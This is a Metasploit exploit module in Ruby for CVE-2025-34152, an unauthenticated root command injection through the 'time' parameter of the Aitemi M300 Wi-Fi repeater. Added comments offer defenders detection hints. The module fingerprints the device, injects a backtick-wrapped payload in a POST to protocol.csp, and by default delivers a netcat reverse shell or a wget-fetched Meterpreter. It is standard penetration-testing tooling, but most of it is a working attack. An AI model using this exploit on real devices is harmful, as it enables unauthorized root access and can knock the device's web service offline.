GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/aitemi_m300_time_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'digest'
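# Metasploit module for CVE-2025-34152: command injection through the 'time'
# parameter of the time-configuration endpoint on the Shenzhen Aitemi M300
# Wi-Fi Repeater (hardware model MT02).
#
# What a defender can take from this file:
# * #check sends only GET requests (favicon.ico, index.html, home.html) and
#   fingerprints the device; it never sends the injection itself.
# * #exploit sends a single POST to protocol.csp. The form body carries
#   opt=time_conf and a 'time' value that begins with %60 (an encoded
#   backtick) where a date would be expected, which makes the request easy to
#   match in HTTP logs or at a reverse proxy.
# * The module metadata declares IOC_IN_LOGS and CRASH_SERVICE_DOWN, i.e. the
#   authors expect log artifacts and a possible outage of the HTTP service.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  # AutoCheck runs #check before #exploit.
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers the module metadata (name, references, targets, notes).
  #
  # @param info [Hash] caller-supplied overrides merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)',
        'Description' => %q{
          This module exploits an unauthenticated remote command injection vulnerability
          in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability
          lies in the 'time' parameter of the time configuration endpoint, which is passed
          unsanitized to a shell command executed via the `date -s` mechanism. The injection
          executes with root privileges, without requiring authentication, reboot, or
          network reconfiguration.
        },
        'Author' => [
          'Valentin Lobstein' # Vulnerability discovery and Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],
          ['CVE', '2025-34152']
        ],
        # %w[] yields the two-element array ['linux', 'unix']. The previous
        # literal, %(linux unix), is a plain String ("linux unix"), which does
        # not name either platform on its own.
        'Platform' => %w[linux unix],
        'Arch' => [ARCH_CMD, ARCH_MIPSBE],
        'Payload' => {
          # 0x60 is the backtick; #exploit wraps the command in backticks.
          'BadChars' => "\x60"
        },
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Meterpreter MIPSBE (MAY crash HTTP worker)',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_CMD, ARCH_MIPSBE],
              'DefaultOptions' => {
                'FETCH_DELETE' => true,
                'FETCH_COMMAND' => 'WGET',
                'FETCH_WRITABLE_DIR' => '/tmp',
                'PAYLOAD' => 'cmd/linux/http/mipsbe/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => true,
        'DisclosureDate' => '2025-08-07',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  # Fingerprints the target with GET requests only.
  #
  # Three signals are used: the SHA-256 of favicon.ico, a Server header that
  # starts with 'lighttpd/1.4.32', and two UI strings in index.html or
  # home.html. None of them is a firmware version, so a match identifies the
  # product rather than a vulnerable build.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the UI strings are found,
  #   Detected when only the favicon and/or Server header matched, Safe when
  #   favicon.ico is not served with 200, Unknown otherwise.
  def check
    fingerprint_hits = []

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'favicon.ico')
    )

    return CheckCode::Unknown('No response from target') unless res
    # NOTE(review): Safe is returned on the favicon status alone, before the
    # Server header and HTML markers are looked at. A device that does not
    # serve favicon.ico would be reported as not affected; Unknown may be the
    # more accurate verdict for anyone using this check to assess exposure.
    return CheckCode::Safe('favicon.ico not found') unless res.code == 200

    hash = Digest::SHA256.hexdigest(res.body)
    if hash == 'eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee'
      print_good('Favicon hash matched – likely Aitemi M300 device')
      fingerprint_hits << 'favicon'
    end

    server_header = res.headers['Server']
    if server_header&.start_with?('lighttpd/1.4.32')
      print_good("HTTP server version matched: #{server_header}")
      fingerprint_hits << 'httpd'
    end

    # The first page containing both UI markers ends the check with Appears.
    %w[index.html home.html].each do |page|
      res_html = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, page)
      )

      next unless res_html&.code == 200

      if res_html.body.include?('langen.js') && res_html.body.include?('dw(TT_SetWifiExt)')
        print_good("HTML fingerprint matched in #{page} – UI strings detected")
        return CheckCode::Appears('HTML language markers confirmed')
      end
    end

    if fingerprint_hits.any?
      return CheckCode::Detected("Partial match: #{fingerprint_hits.join(', ')}")
    end

    CheckCode::Unknown('No identifiable fingerprint found')
  end

  # Sends the single unauthenticated POST that carries the payload in the
  # 'time' form field. The response is not inspected.
  #
  # Detection: the request is a form-encoded POST to protocol.csp with
  # fname=system, opt=time_conf, function=set and a 'time' value starting
  # with %60.
  def exploit
    raw_payload = "`#{payload.encoded}`"
    # CGI.escape encodes spaces as '+'; they are rewritten to %20 here.
    encoded_payload = CGI.escape(raw_payload).gsub('+', '%20')

    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'protocol.csp?'),
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'data' => "fname=system&opt=time_conf&function=set&time=#{encoded_payload}"
    )
  end
end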